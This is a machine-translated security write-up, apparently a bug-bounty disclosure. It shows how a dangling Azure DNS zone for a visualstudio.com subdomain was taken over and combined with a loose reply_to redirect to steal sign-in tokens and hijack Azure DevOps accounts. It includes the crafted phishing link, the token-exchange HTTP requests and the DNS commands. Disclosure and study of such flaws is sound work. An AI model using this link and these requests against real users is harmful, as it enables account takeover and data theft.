Shulou(Shulou.com)05/31 Report--

This article introduces how to achieve Azure DevOps account hijacking through domain name hijacking. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

When testing subdomain name hijacking vulnerabilities (subdomain takeover), you usually need to understand what can be done with hijacked domain names and how harmful and impacting they actually are. Recently, the author hijacked the Microsoft developer website subdomain project-cascade.visualstudio.com and used it to hijack the Azure DevOps account in the integrated development environment. Let's take a look.

Domain name hijacking

Through automated testing, we found a subdomain of * .visualstudio.com-project-cascade.visualstudio.com, whose NS record points to Azure DNS, but from the parsing result of lookup, it is rejected (Refused):

Dns-takeover lookup project-cascade.visualstudio.com. On nameserver ns3-05.azure-dns.org status: [Refused]

Dns-takeover lookup project-cascade.visualstudio.com. On nameserver ns2-05.azure-dns.net status: [Refused]

Dns-takeover lookup project-cascade.visualstudio.com. On nameserver ns1-05.azure-dns.com status: [Refused]

Dns-takeover lookup project-cascade.visualstudio.com. On nameserver ns4-05.azure-dns.info status: [Refused]

From the lookup parsing of the above Refused status, we can see that project-cascade.visualstudio.com was originally registered to point to Azure DNS, but now its registration point with Azure DNS is empty, that is, we can register (takeover) this subdomain name with our existing Azure account, and then create any DNS record in it. The project-cascade.visualstudio.com status after registration is as follows:

Then, add two resolution records to it:

TXT Record-txt.project-cascade.visualstudio.com (with Azure DNS Zone Takeover POC domain name setting instructions)

A Record-arec.project-cascade.visualstudio.com (added to the record where we control the IP address 3.88.203.203)

Use the dig command to query and verify:

$dig txt txt.project-cascade.visualstudio.com @ 1.1.1.1... omitted for brevity... ;; ANSWER SECTION: txt.project-cascade.visualstudio.com. 10 IN TXT "Azure DNS Zone Takeover POC" $dig an arec.project-cascade.visualstudio.com @ 1.1.1.1...omitted for brevity...;; ANSWER SECTION:arec.project-cascade.visualstudio.com 2475 IN A 3.88.203.203 in-depth testing

In this way, we have taken over the project-cascade.visualstudio.com subdomain, so let's take a look at the specific harm it can cause.

We have noticed that some sub-domains under visualstudio.com will perform some identity verification through login.microsoftonline.com. For example, after accessing the domain name app.vssps.visualstudio.com, the following action will occur to jump to login.microsoftonline.com:

Https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Fapp.vsaex.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90#ctx=eyJTaWduSW5Db29raWVEb21haW5zIjpbImh0dHBzOi8vbG9naW4ubWljcm8zb2Z0b25saW5lLmNvbSJdfQ2

And then jump to https://login.microsoftonline.com/...omitted.... For identification.

The two most important parts of the above jump verification mechanism are:

Https://app.vssps.visualstudio.com/_signin:

Reply_to=https%3A%2F%2Fapp.vsaex.visualstudio.com%2F

After testing, we find that the restrictions on domain names in this jump verification mechanism are relatively loose, allowing any * .visualstudio.com subdomain to receive identity verification token. To verify, we constructed the following URL test link:

Https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90

In this construction link, we change the original reply_to parameter value to the subdomain https%3A%2F%2Farec.project-cascade.visualstudio.com%2 that we control. After visiting the link, you will also jump to the normal microsoft live.com login interface. Of course, if the current user is in the post-login status, the jump request will also be executed in it:

Assuming that the victim visits and logs in to the link, a POST request for our controlled domain name arec.project-cascade.visualstudio.com will be executed during the jump, as follows:

POST / _ signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F HTTP/1.1Host: arec.vssps.visualstudio.comCookie:... omitted for brevity...id_token=&FedAuth=&FedAuth2=%2B

In the arec.project-cascade.visualstudio.com backend of the domain we control, an POST request for app.vsaex.visualstudio.com will be automatically initiated, and another identity verification token message for the victim accessing the app.vsaex.visualstudio.com will be received, as shown below:

POST / _ signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F HTTP/1.1Host: arec.project-cascade.visualstudio.comContent-Length: 4634Referer: https://arec.vssps.visualstudio.com/_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2FCookie:... omitted for brevity...id_token=&FedAuth=&FedAuth2=

Vulnerability exploitation

Using the identity verification token obtained above, we can initiate authentication for vsaex.visualstudio.com, dev.azure.com and vssps.dev.azure.com and other legitimate domain names, form a valid login, and hijack the identity of these accounts. For example, take hijacking an app.vsaex.visualstudio.com account as an example, and initiate an identity verification request with the above stolen token:

POST / _ apis/WebPlatformAuth/SessionToken HTTP/1.1Host: app.vsaex.visualstudio.comConnection: closeContent-Length: 105Origin: https://app.vsaex.visualstudio.comX-VSS-ReauthenticationAction: SuppressContent-Type: application/jsonAccept: application/json;api-version=6.0-preview.1;excludeUrls=trueX-Requested-With: XMLHttpRequest...omitted for brevity...Cookie: UserAuthentication=; FedAuth=; FedAuth2= {"appId": "00000000-0000-0000-0000-000000000000", "force": false, "tokenType": 0, "namedTokenId": "Aex.Profile"}

After that, the server responds back to another app.vsaex.visualstudio.com-assigned user's valid token:

HTTP/1.1 200 OKCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheContent-Length: 933Content-Type: application/json; charset=utf-8; api-version=6.0-preview.1...omitted for brevity... {"appId": "00000000-0000-0000-0000-000000000000", "token": "", "tokenType": "session", "validTo": "202005-12T06:45:47.2007474Z", "namedTokenId": "Aex.Profile"}

With this token, you can perform user mail fetch in app.vsaex.visualstudio.com and request:

GET / _ apis/User/User HTTP/1.1Host: app.vsaex.visualstudio.comConnection: closeX-TFS-FedAuthRedirect: SuppressX-VSS-ReauthenticationAction: SuppressX-Requested-With: XMLHttpRequestAccept-Language: en-USAuthorization: Bearer Accept: application/json;api-version=6.0-preview.1;excludeUrls=trueUser-Agent: Mozilla/5.0 (X11 Linux x86 / 64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36X-TFS-Session: ab1e4b56-599c-4ab6-9f5e-756c486a0f2bSec-Fetch-Site: same-originSec-Fetch-Mode: corsReferer: https://app.vsaex.visualstudio.com/me?mkt=en-USAccept-Encoding: gzip, deflate

Response:

HTTP/1.1 200 OKCache-Control: no-cachePragma: no-cacheContent-Length: 258...omitted for brevity... {"descriptor": "msa.NTg0Zjc4NDAtYzc5ZC03MWU0LWJkN2ItMDZhY2Y1N2Q2OTA1", "displayName": "s", "mail": "", "unconfirmedMail": null, "country": "AU", "dateCreated": "2018-05-25T23:19:53.6843383+00:00", "lastModified": "2019-01-06T15:43:50.2963651+00:00", "revision": 0}

At the same time, by stealing the token, you can also access some development projects associated with the dev.azure.com through the link https://app.vsaex.visualstudio.com/me?mkt=en-US:

And can finally access the project resources hosted by the user on the dev.azure.com. Request:

GET / seanyeoh/_usersSettings/keys?__rt=fps&__ver=2 HTTP/1.1Host: dev.azure.comConnection: closex-tfs-fedauthredirect: SuppressOrigin: https://dev.azure.comx-vss-reauthenticationaction: Suppressauthorization: Bearer accept: application/json;api-version=5.0-preview.1;excludeUrls=true;enumsAsNumbers=true;msDateFormat=true;noArrayWrap=trueUser-Agent: Mozilla/5.0 (X11 Linux x86 / 64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Harm and influence

A malicious attacker can construct the following link and send it to the unintentional victim to hijack the victim's account with one click:

Https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90

After the attacker obtains the app.vsaex.visualstudio.com access token, the victim's Azure DevOps environment account can be completely hijacked.

In addition, through the hijacking of project-cascade.visualstudio.com, you can set up MX mail forwarding records, obtain mail data on * .project-cascade.visualstudio.com, and even create SSL certificates to form fraudulent impersonation of Microsoft services.

Vulnerability repair

Re-register the domain name project-cascade.visualstudio.com to gain control over it

Restrict the access of token generated by reply_to in app.vssps.visualstudio.com to domain app.vsaex.visualstudio.com

On how to achieve Azure DevOps account hijacking through domain name hijacking to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.